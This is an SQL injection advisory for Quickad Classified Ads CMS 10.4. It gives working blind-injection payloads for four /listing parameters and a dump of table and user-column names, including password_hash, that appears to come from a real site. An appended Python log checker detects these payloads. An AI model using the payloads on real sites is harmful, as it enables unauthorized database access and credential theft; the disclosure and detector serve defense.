┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://bylancer.com/                                                      │
│  Vendor   : Bylancer                                                                   │
│  Software : Quickad Classified Ads CMS 10.4                                            │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data, and can crash the application or make it unavailable, leading to lost revenue    │
│ and damage to a company's reputation.                                                  │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /listing

https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat=
https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI]


GET parameter 'range1' is vulnerable to SQL Injection

---
Parameter: range1 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1
---

GET parameter 'range2' is vulnerable to SQL Injection

---
Parameter: range2 (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy
---

GET parameter 'placeid' is vulnerable to SQL Injection

---
Parameter: placeid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat=
---

GET parameter 'keywords' is vulnerable to SQL Injection

---
Parameter: keywords (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1
---


[+] Starting the Attack

fetching current database
current database: 'classified_******'


fetching tables

[53 tables]
+---------------------------+
| ad_custom_fields          |
| ad_product                |
| pro_admins                |
| pro_adsense               |
| pro_balance               |
| pro_blog                  |
| pro_blog_cat_relation     |
| pro_blog_categories       |
| pro_blog_comment          |
| pro_catagory_main         |
| pro_catagory_sub          |
| pro_category_translation  |
| pro_cities                |
| pro_countries             |
| pro_currencies            |
| pro_custom_data           |
| pro_custom_fields         |
| pro_custom_options        |
| pro_emailq                |
| pro_faq_entries           |
| pro_favads                |
| pro_firebase_device_token |
| pro_languages             |
| pro_login_attempts        |
| pro_logs                  |
| pro_messages              |
| pro_mobile_numbers        |
| pro_notification          |
| pro_options               |
| pro_pages                 |
| pro_payments              |
| pro_plan_options          |
| pro_plans                 |
| pro_product               |
| pro_product_resubmit      |
| pro_push_notification     |
| pro_qbm_banners           |
| pro_qbm_log               |
| pro_qbm_options           |
| pro_qbm_transactions      |
| pro_qbm_types             |
| pro_reviews               |
| pro_subadmin1             |
| pro_subadmin2             |
| pro_subscriptions         |
| pro_taxes                 |
| pro_testimonials          |
| pro_time_zones            |
| pro_transaction           |
| pro_upgrades              |
| pro_user                  |
| pro_user_options          |
| pro_usergroups            |
+---------------------------+


fetching columns from Table 'pro_user'

[36 columns]
+----------------+----------------------------------------+
| Column         | Type                                   |
+----------------+----------------------------------------+
| description    | text                                   |
| name           | varchar(225)                           |
| status         | enum('0','1','2')                      |
| view           | int(11)                                |
| address        | varchar(255)                           |
| city           | varchar(225)                           |
| confirm        | varchar(255)                           |
| country        | varchar(50)                            |
| created_at     | datetime                               |
| email          | varchar(255)                           |
| facebook       | varchar(255)                           |
| forgot         | varchar(255)                           |
| googleplus     | varchar(255)                           |
| group_id       | int(11)                                |
| id             | int(11)                                |
| image          | varchar(225)                           |
| instagram      | varchar(255)                           |
| lastactive     | datetime                               |
| linkedin       | varchar(255)                           |
| notify         | enum('0','1')                          |
| notify_cat     | varchar(255)                           |
| oauth_link     | varchar(255)                           |
| oauth_provider | enum('','facebook','google','twitter') |
| oauth_uid      | varchar(100)                           |
| online         | enum('0','1')                          |
| password_hash  | varchar(255)                           |
| phone          | varchar(255)                           |
| postcode       | varchar(255)                           |
| sex            | enum('Male','Female','Other')          |
| tagline        | varchar(255)                           |
| twitter        | varchar(255)                           |
| updated_at     | datetime                               |
| user_type      | enum('user','seller')                  |
| username       | varchar(255)                           |
| website        | varchar(255)                           |
| youtube        | varchar(255)                           |
+----------------+----------------------------------------+


[-] Done
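
Added example (not part of the original advisory or the vendor's code): a Python access-log check for the four /listing parameters reported above. It assumes combined-format logs and that placeid, range1 and range2 carry only plain numbers in legitimate traffic; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory reports as injectable on /listing.
# Assumption: placeid, range1 and range2 only ever carry plain numbers in legitimate traffic.
NUMERIC_PARAMS = ("placeid", "range1", "range2")
NUMERIC = re.compile(r"-?\d+(\.\d+)?")
# keywords is free text, so look for SQL call syntax or a quote followed by a boolean operator.
SQL_SHAPE = re.compile(r"(?i)\b(select|sleep|benchmark|union)\s*\(|\bunion\s+select\b|'\s*(x?or|and)\b|--\s")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def audit_listing_request(target):
    """Return {param: reason} for suspicious values in one /listing request target."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != "/listing":
        return {}
    findings = {}
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if value and not NUMERIC.fullmatch(value.strip()):
                findings[name] = "non-numeric value"
    for value in query.get("keywords", []):
        if SQL_SHAPE.search(value):
            findings["keywords"] = "SQL syntax in search text"
    return findings


def scan_log(lines):
    """Return [(client_ip, findings)] for each flagged access-log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (found := audit_listing_request(m.group(2))):
            hits.append((m.group(1), found))
    return hits


# Constructed sample log lines (documentation IPs); payload shapes are the ones quoted above.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2023:10:00:00 +0000] "GET /listing?keywords=iphone+12+%28sealed%29&placeid=276781&range1=100&range2=900 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2023:10:00:05 +0000] "GET /listing?keywords=&placeid=276781&range1=1%20AND%20(SELECT%203133%20FROM%20(SELECT(SLEEP(5)))crfu)&range2=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2023:10:00:12 +0000] "GET /listing?placeid=276781&keywords=1%27XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR%27Z&cat=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2023:10:00:20 +0000] "GET /listing?placeid=276781%27)%20AND%203510=3510%20AND%20(%27DiTr%27=%27DiTr&keywords= HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(*scan_log(SAMPLE_LOG), sep="\n")
```

A log check like this only surfaces probing after the fact; the fix belongs in the application, by casting the numeric parameters to integers and binding keywords through a prepared statement.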